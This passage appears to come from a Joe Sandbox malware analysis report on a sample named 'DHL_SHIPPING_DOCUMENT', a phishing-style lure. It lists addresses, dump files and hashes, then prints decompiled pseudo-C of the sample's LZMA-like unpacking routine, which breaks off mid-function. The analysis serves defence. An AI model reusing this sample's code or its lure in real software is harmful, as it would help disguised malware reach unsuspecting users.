                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407395
                                                              0x00407399
                                                              0x004073bb
                                                              0x004073be
                                                              0x004073c8
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x004073cb
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a5
                                                              0x004073a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00407489
                                                              0x00407489
                                                              0x00000000
                                                              0x00407489
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00407447
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x0040744d
                                                              0x00407447
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074eb
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x0040751d
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000
                                                              0x004075fa
                                                              0x00407447
                                                              0x004073ce
                                                              0x004073cb
                                                              0x00000000
                                                              0x00407120

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                              • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                              • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                              • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
